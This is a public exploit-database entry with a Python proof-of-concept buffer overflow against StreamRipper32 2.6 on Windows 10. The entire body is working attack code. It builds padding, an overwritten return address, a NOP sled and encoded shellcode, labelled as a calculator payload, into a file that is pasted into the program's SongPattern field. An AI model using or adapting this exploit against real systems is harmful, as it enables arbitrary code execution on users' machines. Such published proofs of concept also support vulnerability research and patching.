StreamRipper32 2.6 - Buffer Overflow (PoC)

2020-05-26
ID: 103020
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Date: 2020-05-14
# Exploit Author: Andy Bowden
# Tested On: Win10 x64
# Download Link: http://streamripper.sourceforge.net/sr32/StreamRipper32_2_6.exe
# Vendor Page: http://streamripper.sourceforge.net/
# Version: 2.6
# Steps To Reproduce: Double click on "Add" in the"Station/Song Section" and paste the output in "SongPattern"

#Bad Characters \x00\x0A\x0D  
file = open('exploit.txt', 'wb')  
  
buf = b""  
buf += b"A" * 256  
buf += b"\x47\x23\x30\x74" #74302347  
buf += b"\x90" * 30

#calc payload  
buf += b"\xdb\xc2\xbd\x72\x07\xda\xa7\xd9\x74\x24\xf4\x58\x29"  
buf += b"\xc9\xb1\x31\x83\xe8\xfc\x31\x68\x14\x03\x68\x66\xe5"  
buf += b"\x2f\x5b\x6e\x6b\xcf\xa4\x6e\x0c\x59\x41\x5f\x0c\x3d"  
buf += b"\x01\xcf\xbc\x35\x47\xe3\x37\x1b\x7c\x70\x35\xb4\x73"  
buf += b"\x31\xf0\xe2\xba\xc2\xa9\xd7\xdd\x40\xb0\x0b\x3e\x79"  
buf += b"\x7b\x5e\x3f\xbe\x66\x93\x6d\x17\xec\x06\x82\x1c\xb8"  
buf += b"\x9a\x29\x6e\x2c\x9b\xce\x26\x4f\x8a\x40\x3d\x16\x0c"  
buf += b"\x62\x92\x22\x05\x7c\xf7\x0f\xdf\xf7\xc3\xe4\xde\xd1"  
buf += b"\x1a\x04\x4c\x1c\x93\xf7\x8c\x58\x13\xe8\xfa\x90\x60"  
buf += b"\x95\xfc\x66\x1b\x41\x88\x7c\xbb\x02\x2a\x59\x3a\xc6"  
buf += b"\xad\x2a\x30\xa3\xba\x75\x54\x32\x6e\x0e\x60\xbf\x91"  
buf += b"\xc1\xe1\xfb\xb5\xc5\xaa\x58\xd7\x5c\x16\x0e\xe8\xbf"  
buf += b"\xf9\xef\x4c\xcb\x17\xfb\xfc\x96\x7d\xfa\x73\xad\x33"  
buf += b"\xfc\x8b\xae\x63\x95\xba\x25\xec\xe2\x42\xec\x49\x1c"  
buf += b"\x09\xad\xfb\xb5\xd4\x27\xbe\xdb\xe6\x9d\xfc\xe5\x64"  
buf += b"\x14\x7c\x12\x74\x5d\x79\x5e\x32\x8d\xf3\xcf\xd7\xb1"  
buf += b"\xa0\xf0\xfd\xd1\x27\x63\x9d\x3b\xc2\x03\x04\x44"  
buf += b"\x90" * (1000 - len(buf))  

file.write(buf)
file.close()
1-4-2 (www02)